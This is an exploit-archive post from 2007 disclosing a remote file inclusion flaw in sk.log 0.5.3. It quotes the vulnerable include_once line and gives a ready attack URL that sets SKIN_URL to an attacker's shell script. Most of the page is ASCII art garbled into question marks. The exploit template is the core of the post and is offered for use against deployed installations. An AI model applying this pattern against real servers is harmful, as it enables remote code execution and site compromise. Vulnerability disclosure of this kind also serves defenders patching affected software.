sk.log <= 0.5.3 (skin_url) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : sk.log <= 0.5.3 (skin_url) Remote File Inclusion Vulnerability
# Published : 2007-09-24
# Author : w0cker
# Previous Title : DFD Cart 1.1 Multiple Remote File Inclusion Vulnerabilities
# Next Title : Wordsmith 1.1b (config.inc.php _path) Remote File Inclusion Vuln

?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____ ??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________
# sk.log  <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
##################################################
#ERROR1:log.inc.php
#include_once( "$SKIN_URL/php/logdisplay.inc.php" );<<< rfi coded.
#
#Other Files:
#/php-inc/log.inc.php?SKIN_URL=[ShellScript]
##################################################
#Download:http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip
#
################################################## 
####specialthanx:####KEZZAP66345########################
##################################################

# www.Syue.com [2007-09-24]